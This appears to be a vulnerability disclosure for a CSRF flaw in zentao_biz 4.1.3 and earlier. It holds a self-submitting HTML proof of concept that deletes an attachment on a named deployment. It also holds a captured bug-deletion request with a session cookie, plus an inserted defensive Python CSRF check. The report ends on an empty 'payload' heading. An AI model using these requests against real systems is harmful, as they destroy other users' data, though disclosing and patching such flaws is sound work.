Discoverer: hh

Introduction to zentao

Product official website: https://www.zentao.net/

The zentao Enterprise Edition extends the open source version's project management process horizontally, adding functions such as operations and maintenance management, feedback management, and OA office management to meet the online collaboration needs of more roles, forming a closed-loop management system. The Enterprise Edition adapts better to the individual needs of enterprises, adding functions such as custom workflows, custom dashboards, custom pivot tables, custom charts, and an AI prompt designer, providing more comprehensive support for enterprise project management. In terms of service, the Enterprise Edition provides one-on-one customer success services such as user training, technical support, and review guidance to ensure the system is implemented.

Vulnerability Description

zentao_biz (professional edition) ≤ 4.1.3 does not verify the Referer header and uses no anti-CSRF token, so every function in zentao can be attacked via CSRF.

Vulnerability reproduction

I used black box testing to identify this vulnerability. Below, I give two examples.

If the victim has administrator privileges, the attacker can delete attachments in the document attachment library.


When the victim is logged into zentao and opens our malicious website in the same browser, attachment 66825 will be deleted.

payload

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://plm.infosec.com.cn/index.php">
      <input type="hidden" name="m" value="file" />
      <input type="hidden" name="f" value="delete" />
      <input type="hidden" name="fileID" value="66825" />
      <input type="hidden" name="confirm" value="yes" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

If the victim has normal privileges, the victim can be made to delete a bug they created.

This is a bug deletion request I captured in Burp Suite. I replaced Referer: https://plm.infosec.com.cn/index.php?m=bug&f=delete&bugID=39589 with Referer: https://aaa and found that the bug could still be deleted; this is why I say zentao does not verify the Referer.

```http
GET /index.php?m=bug&f=delete&bugID=39589&confirm=yes HTTP/1.1
Host: plm.infosec.com.cn
Cookie: lang=zh-cn; device=desktop; theme=default; feedbackView=0; lastProduct=295; lastProject=2879; lastTaskModule=0; preProjectID=2879; preBranch=0; lastBugModule=0; preProductID=295; ajax_lastNext=on; pagerMyBug=50; pagerProductAll=200; windowWidth=1920; windowHeight=919; zentaosid=46giq8gdod0d8k4t1sbg1b48rh; from=doc; docFilesViewType=list; bugModule=0; bugBranch=0; treeBranch=0; qaBugOrder=id_desc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://plm.infosec.com.cn/index.php?m=bug&f=delete&bugID=39589
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
```
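As an added example (not part of this report or of zentao's own code), the server-side check below shows what the missing protection looks like: it rejects the captured request once its Referer is swapped for https://aaa, rejects the Burp PoC's GET form submission, and only allows a same-origin POST carrying a per-session synchronizer token. The site origin is taken from the Host header in the capture; the list of state-changing (m, f) actions and the csrf_token field name are assumptions.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Origin of the deployment shown in the report's Host header.
SITE_ORIGIN = "https://plm.infosec.com.cn"
# Constructed list of state-changing zentao actions (m, f); the real app has many more.
STATE_CHANGING = {("file", "delete"), ("bug", "delete")}


def issue_token() -> str:
    """Unguessable per-session token: stored server-side and embedded in every form."""
    return secrets.token_urlsafe(32)


def _origin_of(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}" if p.scheme and p.netloc else ""


def csrf_check(method: str, target: str, headers: dict, body: dict, session_token: str):
    """Return (allowed, reason). target is path+query (e.g. "/index.php?m=bug&f=delete"),
    headers are looked up case-insensitively, body holds parsed POST fields."""
    h = {k.lower(): v for k, v in headers.items()}
    qs = parse_qs(urlsplit(target).query)
    module, func = qs.get("m", [""])[0], qs.get("f", [""])[0]
    if (module, func) not in STATE_CHANGING:
        return True, "not a state-changing action"
    # 1. Fetch metadata: modern browsers label cross-site requests for us.
    sfs = h.get("sec-fetch-site")
    if sfs is not None and sfs != "same-origin":
        return False, f"Sec-Fetch-Site={sfs}"
    # 2. Source check: Origin on cross-site POSTs, Referer as fallback. The report shows
    #    zentao accepting "Referer: https://aaa"; here a foreign or missing source fails.
    source = h.get("origin") or h.get("referer", "")
    if _origin_of(source) != SITE_ORIGIN:
        return False, f"cross-site or missing source {source!r}"
    # 3. Method and synchronizer token: state must never change over GET, and a POST
    #    must carry the session's token, compared in constant time.
    if method.upper() != "POST":
        return False, "state change over GET"
    supplied = str(body.get("csrf_token", ""))
    if not session_token or not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "missing or wrong csrf_token"
    return True, "ok"
```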

When the victim is logged into zentao and opens our malicious website in the same browser, bug 39590 will be deleted.

payload